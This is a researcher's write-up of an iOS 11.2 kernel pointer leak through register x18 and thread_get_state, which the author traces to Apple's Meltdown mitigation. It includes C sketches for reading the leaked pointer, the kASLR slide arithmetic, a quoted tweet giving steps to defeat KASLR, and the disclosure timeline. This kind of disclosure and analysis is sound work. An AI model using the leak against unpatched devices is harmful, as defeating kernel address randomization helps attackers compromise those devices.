Who put that kernel pointer in my crash log?
On February 26th, while looking at an iOS application crash log, I noticed a distinctive value in register x18:
Register x18 contained a value prefixed by 0xfffffff0 (7 fs and a 0), which is the telltale signature of a kernel pointer. I almost dismissed this as a coincidence, but decided to check some other crash logs as well. To my surprise, all of them contained the same value in register x18, even across different apps. This suggested a true kernel information leak, and a serious one. What was going on? The answer would lead back, of all places, to the Meltdown vulnerability.
The shape of a pointer
Kernel pointers are distinctive because they have low entropy (the kernel doesn’t take up that much memory). For example, on macOS, pointers to the kernel image typically begin with 0xffffff80[0-2], pointers to the kernel heap begin with 0xffffff80[1-2] or 0xffffff9[0-2], and pointers to kernel driver images begin with 0xffffff7f[8-9].
On iOS, the layout of the kernel address space is different and varies by device. On the iPhone 7 and later, kernel heap addresses begin with 0xffffffe0 and kernel image addresses begin with 0xfffffff0[0-2]. On the iPhone 5s through iPhone 6s, kernel image and kernel heap addresses both begin with 0xfffffff0.
These ranges may be large, but they are actually quite small when compared to the full space of 64-bit integers. Thus, when I saw that register x18 began with 0xfffffff0, I knew there was a good chance it actually came from the kernel and wasn’t just a big negative number.
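The prefix check described above can be sketched in a few lines of C. This is only a rough heuristic built from the iOS prefixes quoted in the text; the helper names are hypothetical, and it compares just the top 32 bits, which is looser than the 0xfffffff0[0-2] range given for kernel image addresses.

```c
#include <stdbool.h>
#include <stdint.h>

/* Prefixes quoted in the text for iOS; the macro and function names are made up. */
#define IOS_KERNEL_IMAGE_PREFIX 0xfffffff0u /* kernel image (and heap on iPhone 5s-6s) */
#define IOS_KERNEL_HEAP_PREFIX  0xffffffe0u /* kernel heap on iPhone 7 and later */

/* Return the top 32 bits of a 64-bit value. */
static uint32_t high_word(uint64_t value) {
    return (uint32_t)(value >> 32);
}

/* Heuristic only: does this register value carry one of the iOS kernel prefixes? */
static bool looks_like_ios_kernel_pointer(uint64_t value) {
    uint32_t prefix = high_word(value);
    return prefix == IOS_KERNEL_IMAGE_PREFIX || prefix == IOS_KERNEL_HEAP_PREFIX;
}
```

An ordinary userspace address, or a plain -1, does not match either prefix, which is why a value like the one in the crash log stands out.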
Identifying the source of the leak
The first step was to figure out how kernel pointers were getting into register x18. For example, the leak might only be triggered while a process is crashing, or even worse, it might be a strange artifact of the crash reporting machinery itself. Such an information leak would still be interesting, but of limited value. Thus, the very first thing I tried was to create an empty iOS app, set a breakpoint, and read the value in register x18:
And just like that, without writing any code at all, I had a working proof of concept! The fact that the leaked kernel pointer could be retrieved by a debugger on a still-running app strongly suggested that it would be possible to write a standalone exploit.
It looked to me like the x18 register was somehow not being cleared on return from the kernel. The AArch64 ABI specifies that register x18 is reserved for use by the platform, so it’s plausible that no userspace code had modified x18 since the last syscall return.
The next question was whether the kernel pointer could be retrieved directly by the running app. A straightforward way to read the value in a particular register is using inline assembly.[1] Thus, I added inline assembly to read x18 into a variable and printed the result.
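A minimal sketch of such a read, assuming a GCC- or Clang-style compiler with extended inline assembly. The function name read_x18 is hypothetical, and the fallback branch exists only so the snippet still compiles on non-AArch64 machines.

```c
#include <stdint.h>

/* Copy the live value of x18 into a C variable (AArch64 only). */
static uint64_t read_x18(void) {
#if defined(__aarch64__) || defined(__arm64__)
    uint64_t value;
    /* Move x18 into whichever general-purpose register the compiler picks. */
    __asm__ volatile("mov %0, x18" : "=r"(value));
    return value;
#else
    /* No x18 on this architecture; return a placeholder. */
    return 0;
#endif
}
```

Calling read_x18() and printing the result with printf("%llx") is enough to compare the live register against what a debugger reports.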
Interestingly, even though the debugger claimed that x18 contained the kernel pointer, the inline assembly read the value 0. This meant one of two things: either there was some sort of architectural magic going on, or the debugger was somehow not getting the true register values.
As it happens, the way a debugger reads registers from the thread being debugged is using the function thread_get_state. This function retrieves the state of a thread’s registers as they are saved when that thread enters the kernel. Thus, the leaked kernel pointer could be reaching userspace through that function, in which case register x18 might never actually contain a kernel pointer while in userspace.
To test this, I simply called thread_get_state on the current thread and printed the value that the kernel claimed was in register x18:
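A call along those lines might look like the following sketch. It uses the standard Mach interfaces (thread_get_state with the ARM_THREAD_STATE64 flavor); the wrapper name saved_x18 is hypothetical, and the non-Darwin branch is there only so the snippet compiles elsewhere.

```c
#include <stdbool.h>
#include <stdint.h>

#if defined(__APPLE__) && defined(__arm64__)
#include <mach/mach.h>
#endif

/*
 * Ask the kernel for the current thread's saved register state and report
 * the saved x18. Returns false if the call fails or if this is not arm64 Darwin.
 */
static bool saved_x18(uint64_t *out) {
#if defined(__APPLE__) && defined(__arm64__)
    arm_thread_state64_t state;
    mach_msg_type_number_t count = ARM_THREAD_STATE64_COUNT;
    thread_act_t thread = mach_thread_self();
    kern_return_t kr = thread_get_state(thread, ARM_THREAD_STATE64,
                                        (thread_state_t)&state, &count);
    /* mach_thread_self() returns a new port right, so release it. */
    mach_port_deallocate(mach_task_self(), thread);
    if (kr != KERN_SUCCESS) {
        return false;
    }
    *out = state.__x[18];
    return true;
#else
    (void)out;
    return false;
#endif
}
```

On an affected build the reported value would carry the kernel prefix; on a fixed build it should not.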
And voilà! We have found the source of the leak.
While the exploit in this case is completely trivial, you can find a POC on my GitHub.
Is it useful?
The next thing I wanted to know was what type of leak this was. The most interesting kernel pointer disclosures are those that can be used to defeat the kernel’s address space layout randomization (kASLR), which hides where the kernel resides in memory. Because kASLR simply slides the entire kernel image in memory to a new base address, revealing a single known pointer into the kernel image breaks the whole defense by allowing you to compute the kASLR slide directly.
The simplest way to check whether a kernel infoleak is disclosing a kernel image pointer or something else is to get the leaked value, subtract the kASLR slide, and see if the difference is consistent across reboots. If it is, then the infoleak is disclosing a kernel image pointer and the difference is the static address of the leaked pointer in the kernelcache binary.
So, I disclosed the kernel pointer, panicked the phone, and subtracted the kernel slide recorded in the panic log. Repeating this experiment several times always yielded the same value. Thus, I had found a kernel image pointer leak capable of revealing the kernel slide.
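The arithmetic behind this experiment is a single subtraction in each direction. The sketch below uses hypothetical function names, and the addresses in the usage note are made up purely for illustration.

```c
#include <stdint.h>

/* Static (unslid) address of a leaked kernel image pointer, given the kASLR slide. */
static uint64_t unslide(uint64_t leaked, uint64_t slide) {
    return leaked - slide;
}

/* Once the static address is known, a fresh leak reveals the current slide. */
static uint64_t recover_slide(uint64_t leaked, uint64_t static_address) {
    return leaked - static_address;
}
```

For example, if two boots leak 0xfffffff0194cc1d4 and 0xfffffff00f0cc1d4 with recorded slides 0x12400000 and 0x08000000, both unslide to the same value, 0xfffffff0070cc1d4. That consistency is what identifies the leak as a kernel image pointer, and from then on recover_slide turns any new leak into the slide.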
Analyzing the cause of the leak
Once I’d demonstrated that this infoleak could be used to recover the kASLR slide, I reported it to Apple. A few days later, I had some time to try and figure out what was causing the leak.
Since the leak only manifested in register x18, the natural place to begin was scanning XNU source code diffs for occurrences of x18. It quickly became apparent that a large number of changes involving register x18 took place in the file osfmk/arm64/locore.s between XNU versions 4570.20.62 (iOS 11.1) and 4570.31.3 (iOS 11.2). These changes seemed to be related to a feature called __ARM_KERNEL_PROTECT__. Grepping through the source code for references to that string eventually revealed the following comment in the file osfmk/arm64/proc_reg.h:
__ARM_KERNEL_PROTECT__ is a feature intended to guard against potential
architectural or microarchitectural vulnerabilities that could allow cores to
read/access EL1-only mappings while in EL0 mode. This is achieved by
removing as many mappings as possible when the core transitions to EL0 mode
from EL1 mode, and restoring those mappings when the core transitions to EL1
mode from EL0 mode.
That is, when __ARM_KERNEL_PROTECT__ is enabled, transitioning from EL1 (kernel mode) to EL0 (user mode) will remove as many kernel memory mappings as possible. The purpose of this feature is to limit the possible attack surface against kernel memory mappings when exploiting microarchitectural vulnerabilities like Spectre or Meltdown. In fact, a knowledge base article suggests that these changes in iOS 11.2 were specifically designed to protect against Meltdown.
The file osfmk/arm64/locore.s is responsible for, among other things, implementing the ARM exception vectors. Lel0_synchronous_vector_64, the exception vector invoked on a system call (instruction svc #0), was significantly changed while adding support for __ARM_KERNEL_PROTECT__. In iOS 11.2, the implementation looks like this:
The macro MAP_KERNEL is responsible for setting up the EL1 memory mappings for the kernel. It is defined as:
Meanwhile, the macro BRANCH_TO_KVA_VECTOR is responsible for branching to the real implementation of the exception vector, which in this case is Lel0_synchronous_vector_64_long. It is defined as:
Finally, Lel0_synchronous_vector_64_long contains the original definition of the exception vector Lel0_synchronous_vector_64 from iOS 11.1:
Thus, Apple has effectively prefixed the original exception vector with some code to restore the kernel mappings and perform an indirect jump (via x18) to the original implementation.
The problem is that this prefix code clobbers the value of x18 from userspace before the userspace registers are saved. While both macros clobber x18, the information leak that we observe is due to BRANCH_TO_KVA_VECTOR. This macro performs an indirect branch to Lel0_synchronous_vector_64_long through register x18. However, this means x18 is set to Lel0_synchronous_vector_64_long before Lel0_synchronous_vector_64_long has a chance to save the userspace registers. And since the original exception vector implementation does not clear x18 before saving the userspace registers, this makes the clobbered value of x18 available to clients of thread_get_state. The result is that when we call thread_get_state, we end up with a pointer to Lel0_synchronous_vector_64_long in x18.
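The ordering problem can be illustrated with a toy model in C. This is not XNU code: the struct, the function names, and the address standing in for Lel0_synchronous_vector_64_long are all hypothetical, and the model captures only the one detail that matters here, namely that x18 is overwritten before the registers are saved.

```c
#include <stdint.h>
#include <string.h>

#define GPR_COUNT 31

struct registers {
    uint64_t x[GPR_COUNT];
};

/* Made-up kernel address standing in for Lel0_synchronous_vector_64_long. */
#define VECTOR_LONG_KVA 0xfffffff0070cc1d4ULL

/* Models the added prefix: the indirect branch target is loaded into x18. */
static void vector_prefix(struct registers *live) {
    live->x[18] = VECTOR_LONG_KVA;
}

/* Models the original vector body: the live registers become the saved state. */
static void save_user_state(const struct registers *live, struct registers *saved) {
    memcpy(saved, live, sizeof(*saved));
}

/* Exception entry without the prefix (the iOS 11.1 shape). */
static void enter_kernel_11_1(struct registers *live, struct registers *saved) {
    save_user_state(live, saved);
}

/* Exception entry with the prefix (the iOS 11.2 shape): x18 is clobbered first. */
static void enter_kernel_11_2(struct registers *live, struct registers *saved) {
    vector_prefix(live);
    save_user_state(live, saved);
}
```

Starting from a userspace x18 of 0, the saved state holds 0 under the first entry path and the vector's address under the second. In this model, that saved copy is what a thread_get_state client gets to see.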
Timeline
After I discovered and reported the bug on February 26 and provided a more complete analysis on March 2, Apple managed to have the hole fixed in time for their iOS 11.3 release on March 29. The speed at which this bug was fixed was quite a pleasant surprise, especially given that I initially found the bug on a beta release of iOS 11.3.
However, Apple’s initial security announcement for iOS 11.3 did not mention this bug at all. This was a disappointment, but I contacted Apple and they promptly recognized the issue and agreed to assign a CVE and update the advisory.
While waiting for the updated advisory, a friend sent me a link to the following tweet:
How to defeat KASLR on 11.2.6: 1. Create a new xcode project 2. Close it and delete it, choose 'Delete Immediately' from trash 3. Open extra_recipe instead 4. Add a 2 on line 547 so that "i < 28". 5. Remove line 527 6. Who would win, an American multi billion company or one 2boi
— John Åkerblom (@jaakerblom) April 5, 2018
Intrigued, I looked at the GitHub project by John Åkerblom (@jaakerblom and @potmdehex), extra_recipe_extra_bug, that the author mentioned in a reply to the original tweet. It quickly became clear from looking at the source that the leak was coming from Mach exception messages containing register state for a thread. As it turns out, Mach exception messages use the same state that is returned by thread_get_state, which means this is another way of triggering the same bug.
Shortly after that, Viktor Oreshkin (@stek29) published a brief analysis:
So, speaking of info leak (found by @potmdehex I guess): It leaks kernel address of Lel0_synchronous_vector_64_long exception handler.
— Viktor Oreshkin (@stek29) April 6, 2018
Here's how you find unslid address (in kernel cache for example): https://t.co/egJA3FI4As
At that point, I decided to publish my work, even though Apple hadn’t updated the advisory yet.
Conclusion
Given how easy it was to detect, I’m quite surprised that this information leak lasted for nearly 3 months before it was discovered. I wouldn’t be surprised to learn that other parties had found the leak earlier than me but didn’t disclose it.
This bug was an all-around pleasure to find, exploit, and analyze. Stumbling onto a security issue by accident is by far my favorite way to find a bug. Not only that, I quite enjoyed the experience of developing a complete proof-of-concept exploit for a serious security vulnerability without writing a single line of code. And to top it all off, I learned that the bug was actually introduced by the mitigation against Meltdown! (Who’d have thought that the fix for a really big information leak would introduce a small information leak?) Quite good fun, and I hope we never see its like again.
Update (2018.09.24)
Apple assigned this issue CVE-2018-4185 and updated their advisory for iOS 11.3 on July 19, 2018.
Footnotes
[1] An even easier way is to mark a local variable as occupying a particular register using an asm annotation. However, I wanted to explicitly step through what happened when x18 was read into another register.